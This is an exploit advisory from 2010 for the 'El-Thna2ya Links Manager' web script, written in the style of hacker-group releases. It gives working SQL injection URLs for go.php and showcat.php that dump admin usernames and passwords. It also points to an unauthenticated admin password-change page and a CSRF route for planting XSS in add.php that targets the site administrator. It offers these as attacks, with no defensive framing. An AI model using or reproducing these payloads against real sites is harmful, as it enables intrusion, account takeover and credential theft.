#########################################################################################
# Exploit Title : El-Thna2ya Links Manager Multiple Vulnerabilities
# Date : 20 - 6 - 2010
# Author : S.W.T
# Software Link : http://www.mediafire.com/?mjjfjmyzmej
# Version : All Versions
# Tested on : Linux
# Home : WwW.SeC-WaR.CoM <http://www.sec-war.com/>
#########################################################################################

                         -== SQL Injection Vulenrability ==-

http://www.[site].com/[path]/go.php?id=[SQL1]
[SQL1] =
go.php?id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6+from+user--

http://www.[site].com/[path]/showcat.php?id=[SQL2]
[SQL2]=UniOn+AlL+SelEct+1,concat(username,0x3a,password),3+from+user--

#########################################################################################

                       -== Change Password Vulenrability ==-

The Script Can Bypass The Login Page Of Admin And Chnage The Password Of The
Admin
http://www.[site].com/[path]/admin/chang_u_p.php

#########################################################################################

                                -== CSRF Vulenrability ==-

http://www.[site].com/[path]/add.php
Here You Can Add A New Site To The DataBase
You Can Replace The Site With [XSS] Code
And It Will Scam The Admin xD

#########################################################################################

                                    -== Greetz =-

G3n1ux - PrEdAtOr - xXx - Alnjm33 - xR57 - Ahmadso - Jamba - Dr.silent hill

FireStorm - Mr-Alsaeek - Mr.Viktoor

#########################################################################################